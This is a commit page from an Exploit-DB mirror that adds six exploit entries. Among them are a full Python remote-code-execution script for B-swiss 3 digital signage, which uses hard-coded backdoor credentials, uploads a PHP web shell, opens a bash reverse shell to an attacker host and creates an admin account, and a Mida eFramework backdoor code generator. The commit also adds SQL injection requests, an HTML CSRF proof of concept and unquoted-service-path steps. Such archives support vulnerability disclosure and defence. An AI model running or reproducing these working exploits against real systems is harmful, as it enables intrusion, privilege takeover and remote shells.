bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-09-22

Browse source 
6 changes to exploits/shellcodes

ForensiTAppxService 2.2.0.4 - 'ForensiTAppxService.exe' Unquoted Service Path
Online Shop Project 1.0 - 'p' SQL Injection
BlackCat CMS 1.3.6 - Cross-Site Request Forgery
Seat Reservation System 1.0 - 'id' SQL Injection
Mida eFramework 2.9.0 - Back Door Access
B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution
This commit is contained in:
Offensive Security 2020-09-22 05:02:05 +00:00
parent 0d8101f1a1
commit 87f49d4427
7 changed files with 545 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

70
exploits/hardware/webapps/48823.py Executable file
View file

@ -0,0 +1,70 @@
# Exploit Title: Mida eFramework 2.9.0 - Back Door Access
# Google Dork: Server: Mida eFramework
# Date: 2020-08-27
# Exploit Author: elbae
# Vendor Homepage: https://www.midasolutions.com/
# Software Link: http://ova-efw.midasolutions.com/
# Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
# Version: <= 2.9.0
# CVE : CVE-2020-15921
#! /usr/bin/python3
# -*- coding: utf-8 -*-
from datetime import date
def print_disclaimer():
print("""
---------------------
Disclaimer:
1) For testing purpose only.
2) Do not attack production environments.
3) Intended for educational purposes only and cannot be used for law
violation or personal gain.
4) The author is not responsible for any possible harm caused by this
material.
---------------------""")
def print_info():
print("""
[*] Mida Solutions eFramework PDC Administrative Back-Door access
(CVE-2020-15921)
[*] Reference:
https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
[*] This script can be used to retrieve the code which gives you the
possibility to change the password.
[*] How it works:
1) run the script
2) copy the output to the URL you want to access (i.e.
http://192.168.1.60:8090/PDC/extreq.php?code=THE-CODE)
3) change the password
4) access as admin with the password """)
def main():
print_info()
print_disclaimer()
abc = ['a', 'b', 'c', 'd', 'e', 'f', 'g',
'h', 'i', 'j', 'k', 'l', 'm', 'n',
'o', 'p', 'q', 'r', 's', 't', 'u',
'v', 'w', 'x', 'y', 'z']
baseString = 'midasoluti' # default value from source code
today = date.today()
dateString = "{}0{:02d}0{}".format(today.day, today.month, today.year)
retString = ""
for i in range(0,len(baseString)):
n = int(abc.index(baseString[i]))
m = int(dateString[i])
s = n+m
if (s >= len(abc)):
s = m
retString += abc[s]
print("[+] Generated code: {}".format(retString))
print("[?] Example URL: http://target:8090/PDC/extreq.php?code={0}
".format(retString))
print("[?] Example URL: https://target/PDC/extreq.php?code={0}
".format(retString))
if __name__ == '__main__':
main()

346
exploits/multiple/webapps/48824.py Executable file
View file

@ -0,0 +1,346 @@
# Exploit Title: B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution
# Date: 2020-08-27
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.b-swiss.com
# Version: <= 3.6.5
# CVE : N/A
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# B-swiss 3 Digital Signage System 3.6.5 Backdoor Remote Code Execution
#
#
# Vendor: B-Swiss SARL | b-tween Sarl
# Product web page: https://www.b-swiss.com
# Affected version: 3.6.5
# 3.6.2
# 3.6.1
# 3.6.0
# 3.5.80
# 3.5.40
# 3.5.20
# 3.5.00
# 3.2.00
# 3.1.00
#
# Summary: Intelligent digital signage made easy. To go beyond the
# possibilities offered, b-swiss allows you to create the communication
# solution for your specific needs and your graphic charter. You benefit
# from our experience and know-how in the realization of your digital
# signage project.
#
# Desc: The application suffers from an "authenticated" arbitrary
# PHP code execution. The vulnerability is caused due to the improper
# verification of uploaded files in 'index.php' script thru the 'rec_poza'
# POST parameter. This can be exploited to execute arbitrary PHP code
# by uploading a malicious PHP script file that will be stored in
# '/usr/users' directory. Due to an undocumented and hidden "maintenance"
# account 'admin_m' which has the highest privileges in the application,
# an attacker can use these hard-coded credentials to authenticate and
# use the vulnerable image upload functionality to execute code on the
# server.
#
# ========================================================================================
# lqwrm@metalgear:~/prive$ python3 sign2.py 192.168.10.11 192.168.10.22 7777
# [*] Checking target...
# [*] Good to go!
# [*] Checking for previous attempts...
# [*] All good.
# [*] Getting backdoor session...
# [*] Got master backdoor cookie: 0c1617103c6f50107d09cb94b3eafeb2
# [*] Starting callback listener child thread
# [*] Starting handler on port 7777
# [*] Adding GUI credentials: test:123456
# [*] Executing and deleting stager file
# [*] Connection from 192.168.10.11:40080
# [*] You got shell!
# id ; uname -or
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
# 4.15.0-20-generic GNU/Linux
# exit
# *** Connection closed by remote host ***
# [?] Want me to remove the GUI credentials? y
# [*] Removing...
# [*] t00t!
# lqwrm@metalgear:~/prive$
# ========================================================================================
#
# Tested on: Linux 5.3.0-46-generic x86_64
# Linux 4.15.0-20-generic x86_64
# Linux 4.9.78-xxxx-std-ipv6-64
# Linux 4.7.0-040700-generic x86_64
# Linux 4.2.0-27-generic x86_64
# Linux 3.19.0-47-generic x86_64
# Linux 2.6.32-5-amd64 x86_64
# Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64
# macOS 10.13.5
# Microsoft Windows 7 Business Edition SP1 i586
# Apache/2.4.29 (Ubuntu)
# Apache/2.4.18 (Ubuntu)
# Apache/2.4.7 (Ubuntu)
# Apache/2.2.22 (Win64)
# Apache/2.4.18 (Ubuntu)
# Apache/2.2.16 (Debian)
# PHP/7.2.24-0ubuntu0.18.04.6
# PHP/5.6.40-26+ubuntu18.04.1+deb.sury.org+1
# PHP/5.6.33-1+ubuntu16.04.1+deb.sury.org+1
# PHP/5.6.31
# PHP/5.6.30-10+deb.sury.org~xenial+2
# PHP/5.5.9-1ubuntu4.17
# PHP/5.5.9-1ubuntu4.14
# PHP/5.3.10
# PHP/5.3.13
# PHP/5.3.3-7+squeeze16
# PHP/5.3.3-7+squeeze17
# MySQL/5.5.49
# MySQL/5.5.47
# MySQL/5.5.40
# MySQL/5.5.30
# MySQL/5.1.66
# MySQL/5.1.49
# MySQL/5.0.77
# MySQL/5.0.12-dev
# MySQL/5.0.11-dev
# MySQL/5.0.8-dev
# phpMyAdmin/3.5.7
# phpMyAdmin/3.4.10.1deb1
# phpMyAdmin/3.4.7
# phpMyAdmin/3.3.7deb7
# WampServer 3.2.0
# Acore Framework 2.0
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Macedonian Information Security Research and Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2020-5590
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5590.php
#
#
# 13.06.2020
#
from http.cookiejar import DefaultCookiePolicy# #yciloPeikooCtluafeD tropmi rajeikooc.ptth mofr
from http.cookiejar import CookieJar# oOo #raJeikooC tropmi rajeikooc.ptth mofr
from six.moves import input# #-----------------+-----------------# #tupni trompi sevom.xis morf
from time import sleep# | 01 | 04 | #peels trompi emit morf
import urllib.request# | | | | #tseuqer.billru tropmi
import urllib.parse# | | | | #esrap.billru tropmi
import telnetlib# | | | #biltenlet tropmi
import threading# | | | | #gnidaerht tropmi
import requests# | | | | #stseuqer tropmi
import socket# | | o | #tekcos tropmi
import sys,re# | | | #er,sys tropmi
############## #-----------------+-----------------# ##############
############### oOo ###############
################ | ################
#################### Y ####################
############################ _ ############################
###############################################################################################
class Sign:
def __init__(self):
self.username = b"\x61\x64\x6d\x69\x6e\x5f\x6d"
self.altruser = b"\x62\x2d\x73\x77\x69\x73\x73"
self.password = b"\x44\x50\x36\x25\x57\x33\x64"
self.agent = "SignageBot/1.02"
self.fileid = "251"
self.payload = None
self.answer = False
self.params = None
self.rhost = None
self.lhost = None
self.lport = None
self.send = None
def env(self):
if len(sys.argv) != 4:
self.usage()
else:
self.rhost = sys.argv[1]
self.lhost = sys.argv[2]
self.lport = int(sys.argv[3])
if not "http" in self.rhost:
self.rhost = "http://{}".format(self.rhost)
def usage(self):
self.roger()
print("Usage: python3 {} <RHOST[:RPORT]> <LHOST> <LPORT>".format(sys.argv[0]))
print("Example: python3 {} 192.168.10.11:80 192.168.10.22 7777\n".format(sys.argv[0]))
exit(0)
def roger(self):
waddup = """
____________________
/ \\
! B-swiss 3 !
! RCE !
\____________________/
! !
! !
L_ !
/ _)!
/ /__L
____________/ (____)
(____)
____________ (____)
\_(____)
! !
! !
\__/
"""
print(waddup)
def test(self):
print("[*] Checking target...")
try:
r = requests.get(self.rhost)
response = r.text
if not "B-swiss" in response:
print("[!] Not a b-swiss system")
exit(0)
if "B-swiss" in response:
print("[*] Good to go!")
next
else:
exit(-251)
except Exception as e:
print("[!] Ney ney: {msg}".format(msg=e))
exit(-1)
def login(self):
token = ""
cj = CookieJar()
self.params = {"locator" : "visitor.ProcessLogin",
"username" : self.username,
"password" : self.password,
"x" : "0",
"y" : "0"}
damato = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
damato.addheaders.pop()
damato.addheaders.append(("User-Agent", self.agent))
try:
print("[*] Getting backdoor session...")
damato.open(self.rhost + "/index.php", urllib.parse.urlencode(self.params).encode('utf-8'))
for cookie in cj:
token = cookie.value
print("[*] Got master backdoor cookie: "+token)
except urllib.request.URLError as e:
print("[!] Connection error: {}".format(e.reason))
return token
def upload(self):
j = "\r\n"
self.cookies = {"PNU_RAD_LIB" : self.rtoken}
self.headers = {"Cache-Control" : "max-age=0",
"Content-Type" : "multipart/form-data; boundary=----j",
"User-Agent" : self.agent,
"Accept-Encoding" : "gzip, deflate",
"Accept-Language" : "en-US,en;q=0.9",
"Connection" : "close"}
self.payload = "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/"+self.lhost+"/"+str(self.lport)+" <&1;rm "+self.fileid+".php'\");"
print("[*] Adding GUI credentials: test:123456")
# rec_adminlevel values:
# ----------------------
# 100000 - "b-swiss Maintenance Admin" (Undocumented privilege)
# 7 - "B-swiss admin" <---------------------------------------------------------------------------------------+
# 8 - Other |
# |
self.send = "------j{}Content-Disposition: form-data; ".format(j)# |
self.send += "name=\"locator\"{}Users.Save{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |
self.send += "name=\"page\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"sort\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"id\"{}{}{}------j\r\nContent-Disposition: form-data; ".format(j*2,self.fileid,j,j)# |
self.send += "name=\"ischildgrid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"inpopup\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"ongridpage\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"rowid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"preview_screenid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"rec_firstname\"{}TestF{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |
self.send += "name=\"rec_lastname\"{}TestL{}------j{}Content-Disposition: form-data; ".format(j*2,j,2)# |
self.send += "name=\"rec_email\"{}test@test.cc{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |
self.send += "name=\"rec_username\"{}test{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |
self.send += "name=\"rec_password\"{}123456{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |
self.send += "name=\"rec_cpassword\"{}123456{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |
self.send += "name=\"rec_adminlevel\"{}7{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# <----------+
self.send += "name=\"rec_status\"{}1{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
self.send += "name=\"rec_poza\"; filename=\"Blank.jpg.php\"{}Content-Type: application/octet-stream{}".format(j,j*2)
self.send += self.payload+"{}------j{}Content-Disposition: form-data; ".format(j,j)
self.send += "name=\"rec_poza_face\"{}C:\\fakepath\\Blank.jpg{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
self.send += "name=\"rec_language\"{}french-sw{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
self.send += "name=\"rec_languages[]\"{}2{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
self.send += "name=\"rec_can_change_password\"{}1{}------j--{}".format(j*2,j,j)
requests.post(self.rhost+"/index.php", headers=self.headers, cookies=self.cookies, data=self.send)
print("[*] Executing and deleting stager file")
r = requests.get(self.rhost+"/usr/users/"+self.fileid+".php")
sleep(1)
self.answer = input("[?] Want me to remove the GUI credentials? ").strip()
if self.answer[0] == "y" or self.answer[0] == "Y":
print("[*] Removing...")
requests.get(self.rhost+"/index.php?locator=Users.Delete&id="+self.fileid, headers=self.headers, cookies=self.cookies)
if self.answer[0] == "n" or self.answer[0] == "N":
print("[*] Cool!")
print("[*] t00t!")
exit(-1)
def razmisluju(self):
print("[*] Starting callback listener child thread")
konac = threading.Thread(name="ZSL", target=self.phone)
konac.start()
sleep(1)
self.upload()
def fish(self):
r = requests.get(self.rhost+"/usr/users/", verify=False, allow_redirects=False)
response = r.text
print("[*] Checking for previous attempts...")
if not ".php" in response:
print("[*] All good.")
elif "251.php" in response:
print("[!] Stager file \"{}.php\" still present on the server".format(self.fileid))
def phone(self):
telnetus = telnetlib.Telnet()
print("[*] Starting handler on port {}".format(self.lport))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", self.lport))
while True:
try:
s.settimeout(7)
s.listen(1)
conn, addr = s.accept()
print("[*] Connection from {}:{}".format(addr[0], addr[1]))
telnetus.sock = conn
except socket.timeout as p:
print("[!] No outgoing calls :( ({msg})".format(msg=p))
print("[+] Check your port mappings or increase timeout")
s.close()
exit(0)
break
print("[*] You got shell!")
telnetus.interact()
conn.close()
def main(self):
self.env()
self.test()
self.fish()
self.rtoken = self.login()
self.razmisluju()
if __name__ == '__main__':
Sign().main()

27
exploits/php/webapps/48819.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: Online Shop Project 1.0 - 'p' SQL Injection
# Date: 2020-09-20
# Exploit Author: Augkim
# Vendor Homepage: https://www.sourcecodester.com/php/14448/online-shop-project-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/online-shop-using-php.zip
# Tested on: Apache2
GET
/shop/product.php?p=2%20UNION%20ALL%20SELECT%201,2,3,4,@@datadir,6,7,8--%20-
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0)
Gecko/20100101 Firefox/80.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=lmuj4akmh6q1flmcbnuisgttom
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Origin: foo.example.org
PoC:
/URL/product.php?p=2%20UNION%20ALL%20SELECT%201,2,3,4,@@datadir,6,7,8--%20-

33
exploits/php/webapps/48820.txt Normal file
View file

@ -0,0 +1,33 @@
# Exploit Title: BlackCat CMS 1.3.6 - Cross-Site Request Forgery
# Date: 2020-06-01
# Exploit Author: Noth
# Vendor Homepage: https://github.com/BlackCatDevelopment/BlackCatCMS
# Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
# Version: v1.3.6
# CVE : CVE-2020-25453
BlackCat CMS v1.3.6 has a CSRF vulnerability (bypass csrf_token) that
allows remote arbitrary code execution .
PoC (Remove the csrf_token value) :
<input type=“hidden” name=“&#95;&#95;csrf&#95;magic” value=“”/>
-------------------------------------------------------------------------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState(",",'/')</script>
<form action=“
http://127.0.0.1/blackcatcms-release-1.3/backend/login/ajax_index.php
”method=“POST”>
<input type=“hidden” name=“&#95;&#95;csrf&#95;magic” value=“”/>
<input type=“hidden” name=“username&#95;fieldname”
value=“username&#95;274807982ed4”/>
<input type=“hidden” name=“password&#95;fieldname”
value=“password&#95;75868428f837”/>
<input type=“hidden” name=“&#95;cat&#95;ajax” value=“1”/>
<input type=“hidden” name=“username&#95;274807982ed4” value=“accountname”/>
<input type=“hidden” name=“password&#95;75868428f837” value=“yourpassword”/>
<input type=“submit” value=“Submit request”/>
</form>
</body>
</html>

28
exploits/php/webapps/48822.txt Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: Seat Reservation System 1.0 - 'id' SQL Injection
# Date: 2020-09-20
# Exploit Author: Augkim
# Vendor Homepage: https://www.sourcecodester.com/php/14452/seat-reservation-system-movie-theater-project-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/seat-reservation-system-using-php_0.zip
# Tested on: Apache2
POST
/URL/index.php?page=reserve&id=''union%20select%201,version(),3,4,5,6,7,8--
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0)
Gecko/20100101 Firefox/80.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/sere/
Connection: close
Cookie: PHPSESSID=lmuj4akmh6q1flmcbnuisgttom
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Origin: foo.example.org
PoC:
/URL/index.php?page=reserve&id=''union%20select%201,version(),3,4,5,6,7,8--

35
exploits/windows/local/48821.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: ForensiTAppxService 2.2.0.4 - 'ForensiTAppxService.exe' Unquoted Service Path
# Discovery by: Burhanettin Özgenç
# Discovery Date: 2020-09-15
# Vendor Homepage: https://www.forensit.com/downloads.html
# Tested Version: 2.2.0.4
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ForensiTAppxService" | findstr /i /v """
ForensiT AppX Management Service ForensiTAppxService C:\Program Files (x86)\ForensiT\AppX Management Service\ForensiTAppxService.exe Auto
# Service info:
C:\>sc qc ForensiTAppxService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ForensiTAppxService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\ForensiT\AppX Management Service\ForensiTAppxService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ForensiT AppX Management Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit:
# A successful attempt would require the local user to be able to insert their code in the system
# root path undetected by the OS or other security applications where it could potentially be executed
# during application startup or reboot. If successful, the local user's code would execute with
# the elevated privileges of the application.

6
files_exploits.csv
View file

@ -10382,6 +10382,7 @@ id,file,description,date,author,type,platform,port
48808,exploits/windows/local/48808.txt,"Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path",2020-09-14,LiquidWorm,local,windows, 48808,exploits/windows/local/48808.txt,"Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path",2020-09-14,LiquidWorm,local,windows,
48810,exploits/windows/local/48810.txt,"Pearson Vue VTS 2.3.1911 Installer - 'VUEApplicationWrapper' Unquoted Service Path",2020-09-14,Jok3r,local,windows, 48810,exploits/windows/local/48810.txt,"Pearson Vue VTS 2.3.1911 Installer - 'VUEApplicationWrapper' Unquoted Service Path",2020-09-14,Jok3r,local,windows,
48815,exploits/windows/local/48815.txt,"Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software",2020-09-16,hyp3rlinx,local,windows, 48815,exploits/windows/local/48815.txt,"Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software",2020-09-16,hyp3rlinx,local,windows,
48821,exploits/windows/local/48821.txt,"ForensiTAppxService 2.2.0.4 - 'ForensiTAppxService.exe' Unquoted Service Path",2020-09-21,"Burhanettin Ozgenc",local,windows,
42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux, 42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows, 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows, 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,
@ -40643,6 +40644,11 @@ id,file,description,date,author,type,platform,port
48814,exploits/php/webapps/48814.txt,"Piwigo 2.10.1 - Cross Site Scripting",2020-09-16,Iridium,webapps,php, 48814,exploits/php/webapps/48814.txt,"Piwigo 2.10.1 - Cross Site Scripting",2020-09-16,Iridium,webapps,php,
48817,exploits/multiple/webapps/48817.py,"SpamTitan 7.07 - Remote Code Execution (Authenticated)",2020-09-18,"Felipe Molina",webapps,multiple, 48817,exploits/multiple/webapps/48817.py,"SpamTitan 7.07 - Remote Code Execution (Authenticated)",2020-09-18,"Felipe Molina",webapps,multiple,
48818,exploits/php/webapps/48818.py,"Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated)",2020-09-18,"Nikolas Geiselman",webapps,php, 48818,exploits/php/webapps/48818.py,"Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated)",2020-09-18,"Nikolas Geiselman",webapps,php,
48819,exploits/php/webapps/48819.txt,"Online Shop Project 1.0 - 'p' SQL Injection",2020-09-21,Augkim,webapps,php,
48820,exploits/php/webapps/48820.txt,"BlackCat CMS 1.3.6 - Cross-Site Request Forgery",2020-09-21,Noth,webapps,php,
48822,exploits/php/webapps/48822.txt,"Seat Reservation System 1.0 - 'id' SQL Injection",2020-09-21,Augkim,webapps,php,
48823,exploits/hardware/webapps/48823.py,"Mida eFramework 2.9.0 - Back Door Access",2020-09-21,elbae,webapps,hardware,
48824,exploits/multiple/webapps/48824.py,"B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution",2020-09-21,LiquidWorm,webapps,multiple,
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple, 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php, 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php, 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,

Can't render this file because it is too large.